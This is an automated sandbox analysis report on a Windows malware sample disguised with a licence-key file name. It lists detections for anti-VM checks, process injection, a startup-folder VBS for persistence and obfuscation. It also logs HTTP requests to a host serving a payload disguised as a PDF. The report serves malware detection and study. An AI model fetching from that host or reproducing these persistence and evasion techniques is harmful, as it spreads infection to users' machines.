Edit tour

Windows Analysis Report
LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Overview

General Information

Sample name:	LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe
Analysis ID:	1572322
MD5:	013270d9fd4600004204ed3ba5897636
SHA1:	76e2ddf727114b64a9da2abdaf65f4a25896aa5e
SHA256:	5fc01c554f92ebaaaebf46729cd04d0561703d7dd39d20027dab2a9f8df4d52a
Tags:	exeuser-cocaman
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Drops VBS files to the startup folder

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe" MD5: 013270D9FD4600004204ED3BA5897636)

LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe (PID: 8060 cmdline: "C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe" MD5: 013270D9FD4600004204ED3BA5897636)

WerFault.exe (PID: 8164 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 1168 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1983217284.0000000006320000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe PID: 7648	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe PID: 7648	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe PID: 8060	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.6320000.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, ProcessId: 7648, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4kvideodownloaderplus.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\4kvideodownloaderplus.exe

ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

ReversingLabs: Detection: 23%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\4kvideodownloaderplus.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Joe Sandbox ML: detected

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb]D source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983655225.0000000006450000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb{ source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2913820208.0000000005660000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbP source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbk source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2913820208.0000000005660000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdbhK5 source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000004.00000002.2910694896.0000000001348000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_015D1984
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	0_2_015D1982
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 06597BE7h	0_2_06597B60
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 0659E1E1h	0_2_0659E008
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 0659E1E1h	0_2_0659DFF8
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 06597BE7h	0_2_06597C6D
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 0659FE88h	0_2_0659FDD0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 0659FE88h	0_2_0659FDC8
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 0659833Dh	0_2_065982B8
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 0659833Dh	0_2_065982A9
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 06597BE7h	0_2_06597B2F
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4x nop then jmp 0659E1E1h	0_2_0659E10B

Source: global traffic

HTTP traffic detected: GET /composure/Vuglyxyuvio.pdf HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /composure/Vuglyxyuvio.pdf HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: xianggrhen.com

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xianggrhen.com
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xianggrhen.com/composure/Vuglyxyuvio.pdf
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: http://xianggrhen.com/composure/Vuglyxyuvio.pdfKaUX7OltiTRaxCtDq7h.igiywGRJl7xqn4AVJn
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 4kvideodownloaderplus.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp, LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1959753041.0000000003247000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe, 00000000.00000002.1983887792.0000000006520000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

.NET source code contains very large array initializations

Source: 0.2.LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe.45d89e0.1.raw.unpack, PublisherLocator.cs

Large array initialization: AddExtendedPublisher: array initializer size 360192

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Code function: 0_2_064A1748 NtProtectVirtualMemory,

0_2_064A1748

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_064A0848	0_2_064A0848
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06456E5B	0_2_06456E5B
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_015D230E	0_2_015D230E
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_015D1D79	0_2_015D1D79
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_015D1D88	0_2_015D1D88
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0620CEF0	0_2_0620CEF0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06208533	0_2_06208533
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06204A40	0_2_06204A40
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06206BC1	0_2_06206BC1
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0620CED5	0_2_0620CED5
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0620ACE0	0_2_0620ACE0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0620ACF0	0_2_0620ACF0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06204A30	0_2_06204A30
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06201160	0_2_06201160
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06201150	0_2_06201150
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063044F0	0_2_063044F0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06300040	0_2_06300040
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06300007	0_2_06300007
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063010F8	0_2_063010F8
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063010E9	0_2_063010E9
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06305B08	0_2_06305B08
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06304827	0_2_06304827
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06317CB0	0_2_06317CB0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0631818F	0_2_0631818F
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06316630	0_2_06316630
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06316640	0_2_06316640
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06314FAD	0_2_06314FAD
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0631DFD5	0_2_0631DFD5
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06312CB3	0_2_06312CB3
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06312CDB	0_2_06312CDB
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06310007	0_2_06310007
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06310040	0_2_06310040
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0631A896	0_2_0631A896
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063EE330	0_2_063EE330
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E9058	0_2_063E9058
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E6188	0_2_063E6188
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E7A60	0_2_063E7A60
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E9BD0	0_2_063E9BD0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E69F8	0_2_063E69F8
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063EE320	0_2_063EE320
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E9048	0_2_063E9048
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E6178	0_2_063E6178
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E7A51	0_2_063E7A51
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_063E69E8	0_2_063E69E8
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06594470	0_2_06594470
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0659EF1E	0_2_0659EF1E
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0659D7C0	0_2_0659D7C0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0659D7B0	0_2_0659D7B0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0659F507	0_2_0659F507
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0659C290	0_2_0659C290
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_06593288	0_2_06593288
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0659C2A0	0_2_0659C2A0
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0659E10B	0_2_0659E10B
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0670F120	0_2_0670F120
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_0670E628	0_2_0670E628
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_066F0040	0_2_066F0040
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 0_2_066F0006	0_2_066F0006
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4_2_02CA5A10	4_2_02CA5A10
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4_2_02CA5A20	4_2_02CA5A20
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4_2_02CA1F58	4_2_02CA1F58
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4_2_02CA1F68	4_2_02CA1F68
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4_2_02CA4C80	4_2_02CA4C80
Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe	Code function: 4_2_02CA4C67	4_2_02CA4C67

Source: C:\Users\user\Desktop\LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8060 -s 1168

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Static PE information: invalid certificate

Source: LE-Y5029-D3948-W3029-K4302-Q20930-R4039-Y4938-E3028-LA3829-D300.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

